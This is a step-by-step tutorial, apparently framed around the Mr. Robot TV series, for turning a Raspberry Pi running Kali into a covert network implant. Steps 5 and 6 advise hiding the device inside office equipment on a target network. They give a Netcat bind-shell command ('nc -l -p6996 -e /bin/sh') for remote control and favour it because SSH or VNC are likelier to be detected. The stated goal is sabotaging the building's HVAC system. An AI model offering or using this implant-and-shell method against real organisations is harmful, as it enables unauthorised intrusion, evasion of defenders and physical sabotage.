How to Build a Hacking Raspberry Pi

 

Step 1

Download the ARM Version of Kali

The first step, of course, is to download the ARM version of Kali. Raspberry Pi and many mobile devices use ARM CPUs as they are more energy efficient and cooler, so the Kali operating system must be compiled specifically for it.

Fortunately, the goods folks at Offensive Security have already done this for us. Navigate to Offensive Security's download page to get the Raspberry Pi file. Once you have downloaded the image, unzip it with WinRAR, WinZip, or any other archiving tool that can unzip files.

Step 2 

Download & Install Win32 Disk Imager

Now we need to install the Win32 Disk Imager, which you can download from SourceForge. This tool enables us to write the image to an SD card or USB drive. I recommend a fast SD card of at least 4 GB. You can buy a 16 GB now for about 7 dollars.

Step 3 

Run Disk Imager

Now that you have installed Disk Imager, right click on it and run it as "administrator."

Select the Kali image in the "Image File" window, direct the image to your SD card in the "Device" window, then click on the "Write" button. Be patient, this can take sometime.

If you using Linux, things are bit simpler. No need to download anything. You simply use the dd command (among other things, the dd command is used to create a disk image in digital forensics). If we assume the image is named Kali-RPI.img and the SD card is at /dev/sdc and we want it to copy in 512k block size (bs), then we simply need to type:
kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k

Step 4 

Install the SD Card in the Raspberry Pi

We need to remove the SD card from your PC and now install the SD card into our Raspberry Pi and boot it up. When it boots up, it takes you to a command line opening asking you for your username and password. Type in:
username: root
password: toor
Then type:

kali > startx
This starts the X11 GUI for Kali. Success! Now you have an tiny Kali hacking tool that can be placed anywhere!

Step 5 

 Start a Cryptcat Listener on Raspberry Pi

Now, that we have Raspberry Pi running Kali, we can place it anywhere within the Evil Corporation network. Raspberry Pi has an Ethernet connection and you can add a wireless adapter. The Raspberry Pi is so small it can be hidden in numerous places. These include inside a desktop computer, inside a telephone, clock, etc. without being noticed.

Image via The Security Blogger

Once it is connected, we can start a Netcat listener (Netcat is built into Kali) on it by typing:
kali > nc -l -p6996 -e /bin/sh

This will enable Elliott to connect to a terminal on the Raspberry Pi from anywhere using port 6996.

Now, Elliott can connect back to the Raspberry Pi by using Netcat on his Kali system and typing:
kali > nc 192.168.1.105 6996

When he types ifconfig, he can see that he has a terminal on the Raspberry Pi ready to do some hacking of Evil Corp's HVAC system! Make certain to use the IP address of the Raspberry Pi in your environment.

Of course, there are other methods to connecting back to the Raspberry Pi. He could use SSH, and if he wanted a GUI, install the VNC Server and connect back to it with full GUI control over Kali. The problem with both of those methods is that they are more likely to be detected by Evil Corporation's perimeter network defenses.

Step 6 

Wreak Havoc

Now that Elliott has a Kali installation within Evil Corporation's network, he should be able to use the multitude of tools available for wreaking havoc on Evil Corporation in Kali. In episode 4, he wants to control the HVAC system and turn up the heat to melt the backup tapes. He should be able to do that now that he has embedded Kali within Evil Corporation's network.